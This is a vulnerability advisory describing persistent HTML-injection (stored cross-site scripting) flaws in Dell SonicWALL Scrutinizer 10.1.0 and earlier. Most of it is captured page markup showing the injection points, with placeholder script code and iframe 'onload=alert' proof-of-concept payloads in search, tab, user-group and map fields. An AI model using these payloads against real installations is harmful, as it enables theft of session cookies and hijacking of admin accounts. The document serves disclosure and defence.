source: https://www.securityfocus.com/bid/57949/info

The Dell SonicWALL Scrutinizer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Dell SonicWALL Scrutinizer 10.1.0 and prior versions are vulnerable.

Alarm > New Board & Policy Manager - [BBSearchText] Search item <td class="textRight agNoWrap"> <input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe> <input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button"> <input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button"> Review: Dashboard > Flow Expert > Mytab - [Mytab Name] <div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span> <span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span> <span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab"><span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"> <span tid="5" style="margin-left: 10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; margin-right:10px;">Training</span></span><span class="myv_selectedtab"> <span title="Click to rename" class="jedit" id="tab_7"origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span> <img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab"> <span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div> MyView (CGI) > Value - [newName] <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head> <body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]"> \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body> </html> Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing] <div class="unfortunate" style="" id="settingsContent"> <div id="settingsHeader"></div> <div id="settingsOutput"> <title>User Preferences</title> <div id="mainFrame"> <div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu"> <a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;"class="genericAccordionContainer"> <p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username" type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password"> </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;" id="up_availGroups"><option value="3"><iframe src="a">"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option> <option value="1">Administrators</option><option value="2">Guests</option></select></label>&#8203;&#8203;&#8203;&#8203;&#8203; <input value="Create User" class="button" style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a> <div style="height: 511px; display: none;overflow: hidden;class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div> Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups] <div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr"> <th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;" class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1"> <td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a> </td><td>Google</td><td><a title="Click to change object membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option> <option value="1">Pass Up</option></select></td> <td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div> <div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option> <option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option> <option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option> <option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow"> <td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option> <table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr>&#8203;&#8203;&#8203;&#8203;&#8203;<th style="white-space: nowrap;" nowrap="">Map</th> <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody> <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20"> <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td> &#8203;&#8203;&#8203;&#8203;&#8203;<td class="" align="center">-</td></tr></tbody></table> <tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20"> </th>&#8203;&#8203;&#8203;&#8203;&#8203;<th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap=""> Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap=""> <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object" class="linkLike">Membership</a>&#8203;&#8203;&#8203;&#8203;&#8203;</td><td style="display: none;" class="indexColumn fmaps_bakTrHi highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody> <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;" id="fmaps_containerTitle" class="titleBar">&#8203;&#8203;&#8203;&#8203;&#8203;<span style="float:left" ;="">Settings</span><img title="Map Settings Help" src="/images/common/help.png"><select id="fmaps_groupSelect"> <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google) </iframe></option></select></div>&#8203;&#8203;&#8203;&#8203;&#8203;<div id="fmaps_confBodyContainer"><div id="defaultsContainer"> <li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> &#8203;&#8203;&#8203;&#8203;&#8203;<img src="/images/common/gicon.png" gid="1" title="<iframe src=a>%20%20%20%20">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe> <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)" gid="1"><iframe src="a">%20%20%20...</span> <ul style="display: none;"> <li>Loading...</li> </ul> </li> <li class='expandable noWrapOver lastExpandable'> <div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span> <ul style="display: none;"> <li class="last"><span class=" ">No Devices</span></li> </ul> </li> </ul> </iframe></span></li>